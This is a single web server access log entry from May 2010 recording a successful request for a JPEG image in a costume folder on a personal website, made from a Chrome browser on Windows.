71.228.179.46 - - [31/May/2010:20:32:53 -0500] "GET /costume/025_JPG%20copy.jpg HTTP/1.1" 200 48186 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
